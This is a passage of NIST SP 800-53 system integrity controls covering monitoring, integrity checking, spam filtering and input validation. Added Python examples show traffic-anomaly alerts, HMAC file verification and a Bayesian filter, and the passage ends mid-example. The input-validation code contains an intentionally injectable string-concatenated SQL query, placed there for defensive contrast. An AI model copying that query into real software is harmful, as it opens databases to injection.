Related Controls: AC-2, AC-3, AC-4, AC-8, AC-17, AU-2, AU-6, AU-7, AU-9, AU-12, AU-13, AU-14, CA-7, CM-3, CM-6, CM-8, CM-11, IA-10, IR-4, MA-3, MA-4, PL-9, PM-12, RA-5, RA-10, SC-5, SC-7, SC-18, SC-26, SC-31, SC-35, SC-36, SC-37, SC-43, SI-3, SI-6, SI-7, SR-9, SR-10.

SI-4(1) System Monitoring | System-wide Intrusion Detection System
Control: Connect individual intrusion detection tools into a system-wide intrusion detection system.
Discussion: Linking individual intrusion detection tools into a system-wide intrusion detection system provides additional coverage and effective detection capabilities. The information contained in one intrusion detection tool can be shared widely across the organization, making the system-wide detection capability more robust and powerful.
Related Controls: None.

SI-4(2) System Monitoring | Automated Tools and Mechanisms for Real-time Analysis
Control: Employ automated tools and mechanisms to support near real-time analysis of events.
Discussion: Automated tools and mechanisms include host-based, network-based, transport-based, or storage-based event monitoring tools and mechanisms.
Related Controls: PM-23, PM-25.

SI-4(3) System Monitoring | Automated Tool and Mechanism Integration
Control: Employ automated tools and mechanisms to integrate intrusion detection tools and mechanisms into access control and flow control mechanisms.
Discussion: Using automated tools and mechanisms to integrate intrusion detection tools and mechanisms into access and flow control mechanisms facilitates a rapid response to attacks.
Related Controls: PM-23, PM-25.
SI-4(4) System Monitoring | Inbound and Outbound Communications Traffic
Control: (a) Determine criteria for unusual or unauthorized activities or conditions for inbound and outbound communications traffic; and
Discussion: Unusual or unauthorized activities or conditions related to system inbound and outbound communications traffic include internal traffic that indicates the presence of malicious code or unauthorized use of legitimate code or credentials within organizational systems or propagating among system components, signaling to external systems, and the unauthorized exporting of information.
Related Controls: None.

SI-4(5) System Monitoring | System-generated Alerts
Control: Alert [Assignment: organization-defined personnel or roles] when the following system-generated indications of compromise or potential compromise occur: [Assignment: organization-defined compromise indicators].
Discussion: Alerts may be generated from a variety of sources, including audit records or inputs from malicious code protection mechanisms.
Related Controls: AU-4, AU-5, PE-6.

SI-3(9) Malicious Code Protection | Authenticate Remote Commands
Control: [Withdrawn: Moved to AC-17(10).]

SI-4(6) System Monitoring | Restrict Non-privileged Users
Control: [Withdrawn: Incorporated into AC-6(10).]

SI-4(7) System Monitoring | Automated Response to Suspicious Events
Control: (a) Notify [Assignment: organization-defined incident response personnel (identified by name and/or by role)] of detected suspicious events; and
Discussion: Least-disruptive actions include initiating requests for human responses.
Related Controls: None.
SI-4(9) System Monitoring | Testing of Monitoring Tools and Mechanisms
Control: Test intrusion-monitoring tools and mechanisms [Assignment: organization-defined frequency].
Discussion: Testing intrusion-monitoring tools and mechanisms is necessary to ensure that the tools and mechanisms are operating correctly and continue to satisfy the monitoring objectives of organizations. The frequency and depth of testing depends on the types of tools and mechanisms used by organizations and the methods of deployment.
Related Controls: None.

SI-4(10) System Monitoring | Visibility of Encrypted Communications
Control: Make provisions so that [Assignment: organization-defined encrypted communications traffic] is visible to [Assignment: organization-defined system monitoring tools and mechanisms].
Discussion: Organizations balance the need to encrypt communications traffic to protect data confidentiality with the need to maintain visibility into such traffic from a monitoring perspective. Organizations determine whether the visibility requirement applies to internal encrypted traffic, encrypted traffic intended for external destinations, or a subset of the traffic types.
Related Controls: None.

SI-4(11) System Monitoring | Analyze Communications Traffic Anomalies
Control: Analyze outbound communications traffic at the external interfaces to the system and selected [Assignment: organization-defined interior points within the system] to discover anomalies.
Discussion: Organization-defined interior points include subnetworks and subsystems. Anomalies within organizational systems include large file transfers, long-time persistent connections, attempts to access information from unexpected locations, the use of unusual protocols and ports, the use of unmonitored network protocols (e.g., IPv6 usage during IPv4 transition), and attempted communications with suspected malicious external addresses.
Related Controls: None.
SI-4(12) System Monitoring | Automated Organization-generated Alerts
Control: Alert [Assignment: organization-defined personnel or roles] using [Assignment: organization-defined automated mechanisms] when the following indications of inappropriate or unusual activities with security or privacy implications occur: [Assignment: organization-defined activities that trigger alerts].
Discussion: Organizational personnel on the system alert notification list include system administrators, mission or business owners, system owners, senior agency information security officer, senior agency official for privacy, system security officers, or privacy officers. Automated organization-generated alerts are the security alerts generated by organizations and transmitted using automated means.
Related Controls: None.
SI-4(13) System Monitoring | Analyze Traffic and Event Patterns
Control: (a) Analyze communications traffic and event patterns for the system; (b) Develop profiles representing common traffic and event patterns; and
Discussion: Identifying and understanding common communications traffic and event patterns help organizations provide useful information to system monitoring devices to more effectively identify suspicious or anomalous traffic and events when they occur. Such information can help reduce the number of false positives and false negatives during system monitoring.
Related Controls: None.

SI-4(14) System Monitoring | Wireless Intrusion Detection
Control: Employ a wireless intrusion detection system to identify rogue wireless devices and to detect attack attempts and potential compromises or breaches to the system.
Discussion: Wireless signals may radiate beyond organizational facilities. Organizations proactively search for unauthorized wireless connections.
Related Controls: AC-18, IA-3.

SI-4(15) System Monitoring | Wireless to Wireline Communications
Control: Employ an intrusion detection system to monitor wireless communications traffic as the traffic passes from wireless to wireline networks.
Discussion: Wireless networks are inherently less secure than wired networks. For example, wireless networks are more susceptible to eavesdroppers or traffic analysis than wireline networks.
Related Controls: AC-18.
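SI-4(11) lists the anomalies worth looking for in outbound traffic, SI-4(13) asks for a profile of what normal traffic looks like, and SI-4(12) asks for automated alerts to a notification list. The block below is an added example written for this page, not NIST text or a NIST tool: it builds a protocol/port profile from a constructed baseline, scores each constructed flow record against that profile and against the anomaly types SI-4(11) names, and emits one alert record per flagged flow. The flow fields, the byte and duration thresholds, the "expected countries" set, and the assumption that the monitored network is IPv4-only (so an IPv6 destination is an unmonitored protocol) are all assumptions made for the example.

```python
"""Profile-based outbound traffic anomaly alerts (SI-4(11), SI-4(12), SI-4(13)).

Added example; thresholds, field names and the baseline are constructed, not from NIST.
"""
from collections import Counter
from dataclasses import dataclass
import ipaddress


@dataclass(frozen=True)
class Flow:
    src: str           # internal source address
    dst: str           # external destination address (v4 or v6)
    dport: int         # destination port
    proto: str         # "tcp" or "udp"
    bytes_out: int     # bytes sent outbound
    duration_s: int    # connection lifetime in seconds
    src_country: str   # constructed geolocation label of the client


# Constructed baseline profile: counts of (proto, dport) seen in a "normal" week.
BASELINE = Counter({("tcp", 443): 9000, ("tcp", 80): 1200, ("udp", 53): 4000, ("tcp", 22): 150})
EXPECTED_COUNTRIES = {"US"}              # assumption: all clients normally sit in one region
LARGE_TRANSFER_BYTES = 500 * 1024 * 1024  # assumption: 500 MiB outbound is unusual here
LONG_CONNECTION_S = 8 * 3600              # assumption: 8 h persistent connection is unusual
MONITORED_IP_VERSION = 4                  # assumption: the sensors only see IPv4


def build_profile(flows):
    """SI-4(13)(b): summarize observed flows into a (proto, port) frequency profile."""
    return Counter((f.proto, f.dport) for f in flows)


def is_common(profile, proto, dport, min_share=0.005):
    """A (proto, port) pair is 'common' if it carries at least min_share of baseline flows."""
    total = sum(profile.values())
    return total > 0 and profile[(proto, dport)] / total >= min_share


def analyze_flow(flow, profile=BASELINE):
    """SI-4(11): return the list of anomaly reasons for one flow; [] means nothing unusual."""
    reasons = []
    if not is_common(profile, flow.proto, flow.dport):
        reasons.append(f"unusual protocol/port {flow.proto}/{flow.dport}")
    if ipaddress.ip_address(flow.dst).version != MONITORED_IP_VERSION:
        reasons.append("IPv6 destination on an IPv4-monitored network")
    if flow.bytes_out >= LARGE_TRANSFER_BYTES:
        reasons.append("large outbound transfer")
    if flow.duration_s >= LONG_CONNECTION_S:
        reasons.append("long-lived persistent connection")
    if flow.src_country not in EXPECTED_COUNTRIES:
        reasons.append(f"access from unexpected location {flow.src_country}")
    return reasons


def alert_queue(flows, profile=BASELINE):
    """SI-4(12): one alert record per flagged flow, ready for automated delivery."""
    return [
        {"flow": f"{f.src}->{f.dst}:{f.dport}/{f.proto}", "reasons": r}
        for f in flows
        if (r := analyze_flow(f, profile))
    ]


# Constructed sample: one benign flow and four that each trip a different check.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "93.184.216.34", 443, "tcp", 20_000, 3, "US"),
    Flow("10.0.0.7", "198.51.100.9", 4444, "tcp", 1_200, 40_000, "US"),
    Flow("10.0.0.9", "203.0.113.20", 443, "tcp", 900 * 1024 * 1024, 600, "US"),
    Flow("10.0.0.11", "2001:db8::1", 443, "tcp", 5_000, 10, "US"),
    Flow("10.0.0.13", "192.0.2.50", 22, "tcp", 3_000, 30, "RO"),
]

if __name__ == "__main__":
    for alert in alert_queue(SAMPLE_FLOWS):
        print(alert)
```

The profile is deliberately a plain frequency table so the false-positive trade-off SI-4(13) mentions is visible in one number: lowering `min_share` admits rarer ports as normal, raising it flags more of them.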
SI-4(16) System Monitoring | Correlate Monitoring Information
Control: Correlate information from monitoring tools and mechanisms employed throughout the system.
Discussion: Correlating information from different system monitoring tools and mechanisms can provide a more comprehensive view of system activity.
Related Controls: AU-6.

SI-4(17) System Monitoring | Integrated Situational Awareness
Control: Correlate information from monitoring physical, cyber, and supply chain activities to achieve integrated, organization-wide situational awareness.
Discussion: Correlating monitoring information from a more diverse set of information sources helps to achieve integrated situational awareness.
Related Controls: AU-16, PE-6, SR-2, SR-4, SR-6.

SI-4(18) System Monitoring | Analyze Traffic and Covert Exfiltration
Control: Analyze outbound communications traffic at external interfaces to the system and at the following interior points to detect covert exfiltration of information: [Assignment: organization-defined interior points within the system].
Discussion: Organization-defined interior points include subnetworks and subsystems. Covert means that can be used to exfiltrate information include steganography.
Related Controls: None.

SI-4(19) System Monitoring | Risk for Individuals
Control: Implement [Assignment: organization-defined additional monitoring] of individuals who have been identified by [Assignment: organization-defined sources] as posing an increased level of risk.
Discussion: Indications of increased risk from individuals can be obtained from different sources, including personnel records, intelligence agencies, law enforcement organizations, and other sources. The monitoring of individuals is coordinated with the management, legal, security, privacy, and human resource officials who conduct such monitoring. Monitoring is conducted in accordance with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines.
Related Controls: None.

SI-4(20) System Monitoring | Privileged Users
Control: Implement the following additional monitoring of privileged users: [Assignment: organization-defined additional monitoring].
Discussion: Privileged users have access to more sensitive information, including security-related information, than the general user population.
Related Controls: AC-18.

SI-4(21) System Monitoring | Probationary Periods
Control: Implement the following additional monitoring of individuals during [Assignment: organization-defined probationary period]: [Assignment: organization-defined additional monitoring].
Discussion: During probationary periods, employees do not have permanent employment status within organizations.
Related Controls: AC-18.

SI-4(22) System Monitoring | Unauthorized Network Services
Control: (a) Detect network services that have not been authorized or approved by [Assignment: organization-defined authorization or approval processes]; and
Discussion: Unauthorized or unapproved network services include services in service-oriented architectures that lack organizational verification or validation.
Related Controls: CM-7.

SI-4(23) System Monitoring | Host-based Devices
Control: Implement the following host-based monitoring mechanisms at [Assignment: organization-defined system components]: [Assignment: organization-defined host-based monitoring mechanisms].
Discussion: Host-based monitoring collects information about the host (or system in which it resides).
Related Controls: AC-18, AC-19.

SI-4(24) System Monitoring | Indicators of Compromise
Control: Discover, collect, and distribute to [Assignment: organization-defined personnel or roles], indicators of compromise provided by [Assignment: organization-defined sources].
Discussion: Indicators of compromise (IOC) are forensic artifacts from intrusions that are identified on organizational systems.
Related Controls: AC-18.

SI-4(25) System Monitoring | Optimize Network Traffic Analysis
Control: Provide visibility into network traffic at external and key internal system interfaces to optimize the effectiveness of monitoring devices.
Discussion: Encrypted traffic, asymmetric routing architectures, capacity and latency limitations, and transitioning from older to newer technologies (e.g., IPv4 to IPv6 network protocol transition) may result in blind spots for organizations when analyzing network traffic. Collecting, decrypting, pre-processing, and distributing only relevant traffic to monitoring devices can streamline the efficiency and use of devices and optimize traffic analysis.
Related Controls: None.

SI-4(8) System Monitoring | Protection of Monitoring Information
Control: [Withdrawn: Incorporated into SI-4.]

SI-5 Security Alerts, Advisories, and Directives
Control: a. Receive system security alerts, advisories, and directives from [Assignment: organization-defined external organizations] on an ongoing basis;
Discussion: The Cybersecurity and Infrastructure Security Agency (CISA) generates security alerts and advisories to maintain situational awareness throughout the Federal Government.
Related Controls: PM-15, RA-5, SI-2.

SI-5(1) Security Alerts, Advisories, and Directives | Automated Alerts and Advisories
Control: Broadcast security alert and advisory information throughout the organization using [Assignment: organization-defined automated mechanisms].
Discussion: The significant number of changes to organizational systems and environments of operation requires the dissemination of security-related information to a variety of organizational entities that have a direct interest in the success of organizational mission and business functions. Based on information provided by security alerts and advisories, changes may be required at one or more of the three levels related to the management of risk.
Related Controls: None.

SI-6 Security and Privacy Function Verification
Control: a. Verify the correct operation of [Assignment: organization-defined security and privacy functions]; b. Perform the verification of the functions specified in SI-6a [Selection (one or more): [Assignment: organization-defined system transitional states]; upon command by user with appropriate privilege; [Assignment: organization-defined frequency]];
Discussion: Transitional states for systems include system startup, restart, shutdown, and abort. System notifications include hardware indicator lights, electronic alerts to system administrators, and messages to local computer consoles.
Related Controls: CA-7, CM-4, CM-6, SI-7.

SI-6(2) Security and Privacy Function Verification | Automation Support for Distributed Testing
Control: Implement automated mechanisms to support the management of distributed security and privacy function testing.
Discussion: The use of automated mechanisms to support the management of distributed function testing helps to ensure the integrity, timeliness, completeness, and efficacy of such testing.
Related Controls: SI-2.

SI-6(3) Security and Privacy Function Verification | Report Verification Results
Control: Report the results of security and privacy function verification to [Assignment: organization-defined personnel or roles].
Discussion: Organizational personnel with potential interest in the results of the verification of security and privacy functions include systems security officers, senior agency information security officers, and senior agency officials for privacy.
Related Controls: SI-4, SR-4, SR-5.
SI-7 Software, Firmware, and Information Integrity
Control: a. Employ integrity verification tools to detect unauthorized changes to the following software, firmware, and information: [Assignment: organization-defined software, firmware, and information]; and
Discussion: Unauthorized changes to software, firmware, and information can occur due to errors or malicious activity.
Related Controls: AC-4, CM-3, CM-7, CM-8, MA-3, MA-4, RA-5, SA-8, SA-9, SA-10, SC-8, SC-12, SC-13, SC-28, SC-37, SI-3, SR-3, SR-4, SR-5, SR-6, SR-9, SR-10, SR-11.

SI-6(1) Security and Privacy Function Verification | Notification of Failed Security Tests
Control: [Withdrawn: Incorporated into SI-6.]

SI-7(1) Software, Firmware, and Information Integrity | Integrity Checks
Control: Perform an integrity check of [Assignment: organization-defined software, firmware, and information] [Selection (one or more): at startup; at [Assignment: organization-defined transitional states or security-relevant events]; [Assignment: organization-defined frequency]].
Discussion: Security-relevant events include the identification of new threats to which organizational systems are susceptible and the installation of new hardware, software, or firmware. Transitional states include system startup, restart, shutdown, and abort.
Related Controls: None.

SI-7(2) Software, Firmware, and Information Integrity | Automated Notifications of Integrity Violations
Control: Employ automated tools that provide notification to [Assignment: organization-defined personnel or roles] upon discovering discrepancies during integrity verification.
Discussion: The employment of automated tools to report system and information integrity violations and to notify organizational personnel in a timely manner is essential to effective risk response. Personnel with an interest in system and information integrity violations include mission and business owners, system owners, senior agency information security official, and senior agency official for privacy.
Related Controls: None.

SI-7(3) Software, Firmware, and Information Integrity | Centrally Managed Integrity Tools
Control: Employ centrally managed integrity verification tools.
Discussion: Centrally managed integrity verification tools provide greater consistency in the application of such tools.
Related Controls: AU-3, SI-2, SI-8.
SI-7(5) Software, Firmware, and Information Integrity | Automated Response to Integrity Violations
Control: Automatically [Selection (one or more): shut the system down; restart the system; implement [Assignment: organization-defined controls]] when integrity violations are discovered.
Discussion: Organizations may define different integrity-checking responses by type of information, specific information, or a combination of both. Types of information include firmware, software, and user data. Specific information includes boot firmware for certain types of machines. The automatic implementation of controls within organizational systems includes reversing the changes, halting the system, or triggering audit alerts when unauthorized modifications to critical security files occur.
Related Controls: None.

SI-7(6) Software, Firmware, and Information Integrity | Cryptographic Protection
Control: Implement cryptographic mechanisms to detect unauthorized changes to software, firmware, and information.
Discussion: Cryptographic mechanisms used to protect integrity include digital signatures and the computation and application of signed hashes using asymmetric cryptography, protecting the confidentiality of the key used to generate the hash, and using the public key to verify the hash information.
Related Controls: SC-12, SC-13.

SI-7(7) Software, Firmware, and Information Integrity | Integration of Detection and Response
Control: Incorporate the detection of the following unauthorized changes into the organizational incident response capability: [Assignment: organization-defined security-relevant changes to the system].
Discussion: Integrating detection and response helps to ensure that detected events are tracked, monitored, corrected, and available for historical purposes.
Related Controls: AU-2, AU-6, IR-4, IR-5, SI-4.

SI-7(8) Software, Firmware, and Information Integrity | Auditing Capability for Significant Events
Control: Upon detection of a potential integrity violation, provide the capability to audit the event and initiate the following actions: [Selection (one or more): generate an audit record; alert current user; alert [Assignment: organization-defined personnel or roles]; [Assignment: organization-defined other actions]].
Discussion: Organizations select response actions based on types of software, specific software, or information for which there are potential integrity violations.
Related Controls: AU-2, AU-6, AU-12.

SI-7(9) Software, Firmware, and Information Integrity | Verify Boot Process
Control: Verify the integrity of the boot process of the following system components: [Assignment: organization-defined system components].
Discussion: Ensuring the integrity of boot processes is critical to starting system components in known, trustworthy states. Integrity verification mechanisms provide a level of assurance that only trusted code is executed during boot processes.
Related Controls: SI-6.

SI-7(10) Software, Firmware, and Information Integrity | Protection of Boot Firmware
Control: Implement the following mechanisms to protect the integrity of boot firmware in [Assignment: organization-defined system components]: [Assignment: organization-defined mechanisms].
Discussion: Unauthorized modifications to boot firmware may indicate a sophisticated, targeted attack. These types of targeted attacks can result in a permanent denial of service or a persistent malicious code presence.
Related Controls: SI-6.

SI-7(11) Software, Firmware, and Information Integrity | Confined Environments with Limited Privileges
Control: [Withdrawn: Moved to CM-7(6).]

SI-7(12) Software, Firmware, and Information Integrity | Integrity Verification
Control: Require that the integrity of the following user-installed software be verified prior to execution: [Assignment: organization-defined user-installed software].
Discussion: Organizations verify the integrity of user-installed software prior to execution to reduce the likelihood of executing malicious code or programs that contain errors from unauthorized modifications.
Related Controls: CM-11.

SI-7(13) Software, Firmware, and Information Integrity | Code Execution in Protected Environments
Control: [Withdrawn: Moved to CM-7(7).]

SI-7(14) Software, Firmware, and Information Integrity | Binary or Machine Executable Code
Control: [Withdrawn: Moved to CM-7(8).]

SI-7(15) Software, Firmware, and Information Integrity | Code Authentication
Control: Implement cryptographic mechanisms to authenticate the following software or firmware components prior to installation: [Assignment: organization-defined software or firmware components].
Discussion: Cryptographic authentication includes verifying that software or firmware components have been digitally signed using certificates recognized and approved by organizations.
Related Controls: CM-5, SC-12, SC-13.
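SI-7 asks for an integrity verification tool, SI-7(1) for checks at startup or on a schedule, SI-7(2) for notification of discrepancies, and SI-7(6) for a cryptographic mechanism so that the check itself cannot be quietly rewritten. The block below is an added example for this page, not NIST code and not any particular product: it baselines a directory with SHA-256, authenticates the manifest with an HMAC, and returns the discrepancy list a notifier would consume. The keyed hash (HMAC) stands in for the signed hash SI-7(6) describes because it needs only the standard library; the temporary directory, file names, contents and the demo key are constructed for the example. The key is assumed to be stored outside the monitored tree.

```python
"""Baseline-and-verify file integrity checker (SI-7, SI-7(1), SI-7(2), SI-7(6)).

Added example, not from NIST. HMAC-SHA256 over the manifest is used in place of an
asymmetric signature; the key is assumed to live outside the monitored tree.
"""
import hashlib
import hmac
import json
import tempfile
from pathlib import Path

CHUNK = 64 * 1024


def sha256_file(path):
    """Streamed SHA-256 so large firmware images do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def _canonical(entries):
    # Sorted, whitespace-free JSON so the same entries always produce the same bytes.
    return json.dumps(entries, sort_keys=True, separators=(",", ":")).encode()


def build_manifest(root, key):
    """Hash every regular file under root and authenticate the entry list with HMAC."""
    root = Path(root)
    entries = {p.relative_to(root).as_posix(): sha256_file(p)
               for p in sorted(root.rglob("*")) if p.is_file()}
    tag = hmac.new(key, _canonical(entries), hashlib.sha256).hexdigest()
    return {"entries": entries, "tag": tag}


def verify(root, manifest, key):
    """Return a list of (path, finding) discrepancies; an empty list means clean.

    The manifest tag is checked first: if an adversary edits both a file and its
    recorded hash, the HMAC fails and the whole manifest is reported as untrusted.
    """
    expected = hmac.new(key, _canonical(manifest["entries"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, manifest["tag"]):
        return [("<manifest>", "manifest authentication failed")]
    root = Path(root)
    current = {p.relative_to(root).as_posix(): sha256_file(p)
               for p in sorted(root.rglob("*")) if p.is_file()}
    findings = []
    for rel, digest in manifest["entries"].items():
        if rel not in current:
            findings.append((rel, "missing"))
        elif current[rel] != digest:
            findings.append((rel, "modified"))
    findings.extend((rel, "unexpected file") for rel in current if rel not in manifest["entries"])
    return findings


def demo():
    """Constructed scenario: baseline three files, tamper, then forge the manifest."""
    key = b"constructed-demo-key-do-not-use"
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "bin").mkdir()
        (root / "bin" / "agent").write_bytes(b"\x7fELF original agent")
        (root / "etc.conf").write_text("mode=strict\n")
        (root / "firmware.bin").write_bytes(bytes(range(32)))
        manifest = build_manifest(root, key)
        clean = verify(root, manifest, key)

        # Adversary: trojans the binary, deletes the config, drops a new file.
        (root / "bin" / "agent").write_bytes(b"\x7fELF trojaned agent")
        (root / "etc.conf").unlink()
        (root / "dropper.sh").write_text("#!/bin/sh\n")
        tampered = sorted(verify(root, manifest, key))

        # Adversary also rewrites the recorded hash; without the key the tag no longer matches.
        forged = {"entries": dict(manifest["entries"]), "tag": manifest["tag"]}
        forged["entries"]["bin/agent"] = sha256_file(root / "bin" / "agent")
        forged_result = verify(root, forged, key)
        return clean, tampered, forged_result


if __name__ == "__main__":
    for label, result in zip(("clean", "tampered", "forged manifest"), demo()):
        print(label, result)
```

In a deployment the `verify` call is what runs at the SI-7(1) trigger points (startup, a transitional state, a schedule), and the returned list is what the SI-7(2) notifier sends; the empty-list case is the one to alert on never, and the `<manifest>` case is the one to alert on loudest.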
SI-7(16) Software, Firmware, and Information Integrity | Time Limit on Process Execution Without Supervision
Control: Prohibit processes from executing without supervision for more than [Assignment: organization-defined time period].
Discussion: Placing a time limit on process execution without supervision is intended to apply to processes for which typical or normal execution periods can be determined and situations in which organizations exceed such periods. Supervision includes timers on operating systems, automated responses, and manual oversight and response when system process anomalies occur.
Related Controls: None.

SI-7(17) Software, Firmware, and Information Integrity | Runtime Application Self-protection
Control: Implement [Assignment: organization-defined controls] for application self-protection at runtime.
Discussion: Runtime application self-protection employs runtime instrumentation to detect and block the exploitation of software vulnerabilities by taking advantage of information from the software in execution.
Related Controls: SI-16.

SI-7(4) Software, Firmware, and Information Integrity | Tamper-evident Packaging
Control: [Withdrawn: Incorporated into SR-9.]

SI-8 Spam Protection
Control: a. Employ spam protection mechanisms at system entry and exit points to detect and act on unsolicited messages; and
Discussion: System entry and exit points include firewalls, remote-access servers, electronic mail servers, web servers, proxy servers, workstations, notebook computers, and mobile devices.
Related Controls: PL-9, SC-5, SC-7, SC-38, SI-3, SI-4.

SI-8(1) Spam Protection | Central Management
Control: [Withdrawn: Incorporated into PL-9.]

SI-8(2) Spam Protection | Automatic Updates
Control: Automatically update spam protection mechanisms [Assignment: organization-defined frequency].
Discussion: Using automated mechanisms to update spam protection mechanisms helps to ensure that updates occur on a regular basis and provide the latest content and protection capabilities.
Related Controls: None.

SI-8(3) Spam Protection | Continuous Learning Capability
Control: Implement spam protection mechanisms with a learning capability to more effectively identify legitimate communications traffic.
Discussion: Learning mechanisms include Bayesian filters that respond to user inputs that identify specific traffic as spam or legitimate by updating algorithm parameters and thereby more accurately separating types of traffic.
Related Controls: None.
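SI-8(3) names Bayesian filters that update their parameters from user feedback. The block below is an added example for this page (not NIST code and not any mail product's implementation): a naive Bayes classifier over token presence, with Laplace smoothing, whose `learn` method is exactly the "user identifies this message as spam or legitimate" input the control describes. The training messages and the misclassified accounting message are constructed; the point the example makes is that one piece of user feedback moves a false positive back to the legitimate side while the clearly spammy message stays flagged.

```python
"""Naive Bayes spam filter with feedback learning (SI-8(3)).

Added example, not from NIST. Training data and the example messages are constructed.
"""
import math
import re
from collections import Counter

TOKEN_RE = re.compile(r"[a-z0-9$']+")


def tokenize(text):
    """Token presence, not counts: one vote per distinct word in a message."""
    return set(TOKEN_RE.findall(text.lower()))


class BayesianSpamFilter:
    def __init__(self, alpha=1.0):
        self.alpha = alpha          # Laplace smoothing so unseen words are not zero-probability
        self.spam_docs = 0
        self.ham_docs = 0
        self.spam_tokens = Counter()  # number of spam messages containing each token
        self.ham_tokens = Counter()   # number of legitimate messages containing each token
        self.vocab = set()

    def learn(self, text, is_spam):
        """Update the model from a labelled message. User feedback calls this too."""
        toks = tokenize(text)
        self.vocab |= toks
        if is_spam:
            self.spam_docs += 1
            self.spam_tokens.update(toks)
        else:
            self.ham_docs += 1
            self.ham_tokens.update(toks)

    def spam_log_odds(self, text):
        """log P(spam | tokens) - log P(ham | tokens), up to the shared normalizer."""
        a = self.alpha
        lo = math.log((self.spam_docs + a) / (self.ham_docs + a))  # class prior
        for t in tokenize(text):
            if t not in self.vocab:
                continue  # never-seen word carries no evidence either way
            p_spam = (self.spam_tokens[t] + a) / (self.spam_docs + 2 * a)
            p_ham = (self.ham_tokens[t] + a) / (self.ham_docs + 2 * a)
            lo += math.log(p_spam) - math.log(p_ham)
        return lo

    def is_spam(self, text):
        return self.spam_log_odds(text) > 0


# Constructed seed corpus.
SEED_SPAM = ["win a free prize claim now", "free money click now",
             "urgent invoice payment claim your prize"]
SEED_HAM = ["meeting agenda for monday attached", "lunch at noon with the team",
            "quarterly report draft for review"]


def trained_filter():
    f = BayesianSpamFilter()
    for m in SEED_SPAM:
        f.learn(m, is_spam=True)
    for m in SEED_HAM:
        f.learn(m, is_spam=False)
    return f


def feedback_demo():
    """A legitimate accounting message is flagged because 'invoice' and 'payment'
    only ever appeared in spam; the user marks it legitimate; it is re-scored."""
    f = trained_filter()
    msg = "urgent invoice payment due"
    before = f.is_spam(msg)
    f.learn(msg, is_spam=False)   # the SI-8(3) user input
    after = f.is_spam(msg)
    return before, after, f.is_spam("free prize claim now")


if __name__ == "__main__":
    print(feedback_demo())
```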
SI-10 Information Input Validation
Control: Check the validity of the following information inputs: [Assignment: organization-defined information inputs to the system].
Discussion: Checking the valid syntax and semantics of system inputs—including character set, length, numerical range, and acceptable values—verifies that inputs match specified definitions for format and content. For example, if the organization specifies that numerical values between 1-100 are the only acceptable inputs for a field in a given application, inputs of 387, abc, or %K% are invalid inputs and are not accepted as input to the system.
Related Controls: None.

SI-10(1) Information Input Validation | Manual Override Capability
Control: (a) Provide a manual override capability for input validation of the following information inputs: [Assignment: organization-defined inputs defined in the base control (SI-10)]; and
Discussion: In certain situations, such as during events that are defined in contingency plans, a manual override capability for input validation may be needed.
Related Controls: AC-3, AU-2, AU-12.

SI-10(2) Information Input Validation | Review and Resolve Errors
Control: Review and resolve input validation errors within [Assignment: organization-defined time period].
Discussion: Resolution of input validation errors includes correcting systemic causes of errors and resubmitting transactions with corrected input. Input validation errors are those related to the information inputs defined by the organization in the base control (SI-10).
Related Controls: None.

SI-10(3) Information Input Validation | Predictable Behavior
Control: Verify that the system behaves in a predictable and documented manner when invalid inputs are received.
Discussion: A common vulnerability in organizational systems is unpredictable behavior when invalid inputs are received. Verification of system predictability helps ensure that the system behaves as expected when invalid inputs are received. This occurs by specifying system responses that allow the system to transition to known states without adverse, unintended side effects. The invalid inputs are those related to the information inputs defined by the organization in the base control (SI-10).
Related Controls: None.

SI-10(4) Information Input Validation | Timing Interactions
Control: Account for timing interactions among system components in determining appropriate responses for invalid inputs.
Discussion: In addressing invalid system inputs received across protocol interfaces, timing interactions become relevant, where one protocol needs to consider the impact of the error response on other protocols in the protocol stack. For example, 802.11 standard wireless network protocols do not interact well with the Transmission Control Protocol (TCP) when packets are dropped (which could be due to invalid packet input).
Related Controls: None.

SI-10(5) Information Input Validation | Restrict Inputs to Trusted Sources and Approved Formats
Control: Restrict the use of information inputs to [Assignment: organization-defined trusted sources] and/or [Assignment: organization-defined formats].
Discussion: Restricting the use of inputs to trusted sources and in trusted formats applies the concept of authorized or permitted software to information inputs.
Related Controls: AC-3, AC-6.

SI-10(6) Information Input Validation | Injection Prevention
Control: Prevent untrusted data injections.
Discussion: Untrusted data injections may be prevented using a parameterized interface or output escaping (output encoding).
Related Controls: AC-3, AC-6.
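The SI-10 discussion gives a concrete rule (an integer field that accepts only 1-100, so 387, abc and %K% must be rejected), SI-10(3) asks that rejection be predictable and documented, and SI-10(6) names the parameterized interface as the injection defence. The block below is an added example for this page, not NIST code: it implements that field rule as an allow-list check, shows a string-concatenated SQL lookup beside the parameterized one so the injection is visible on constructed data, and wraps both behind a request handler with a single documented failure mode. The `users` table, field names and the `sqlite3` in-memory database are constructed for the example.

```python
"""Input validation (SI-10), predictable rejection (SI-10(3)), injection prevention (SI-10(6)).

Added example, not from NIST. The table, field names and sample rows are constructed.
"""
import re
import sqlite3


class InvalidInput(ValueError):
    """The one documented failure mode: every rejected input raises this with the field name."""


def validate_quantity(raw):
    """The page's rule: a decimal integer in the range 1-100. Allow-list, not deny-list."""
    if not isinstance(raw, str) or not re.fullmatch(r"[0-9]{1,3}", raw):
        raise InvalidInput("quantity: not a decimal integer")   # rejects abc, %K%, 1e2, ''
    value = int(raw)
    if not 1 <= value <= 100:
        raise InvalidInput("quantity: out of range 1-100")        # rejects 387 and 0
    return value


def is_rejected(raw):
    """Convenience for tests and callers that only need a yes/no answer."""
    try:
        validate_quantity(raw)
    except InvalidInput:
        return True
    return False


USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")


def validate_username(raw):
    if not isinstance(raw, str) or not USERNAME_RE.fullmatch(raw):
        raise InvalidInput("username: allowed charset is [A-Za-z0-9_], length 1-32")
    return raw


def make_db():
    """Constructed sample table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, role TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [("alice", "admin"), ("bob", "user"), ("carol", "user")])
    return db


def lookup_unsafe(db, name):
    """Vulnerable on purpose, for contrast: the value becomes part of the SQL text."""
    return [r[0] for r in db.execute("SELECT name FROM users WHERE name = '" + name + "'")]


def lookup_safe(db, name):
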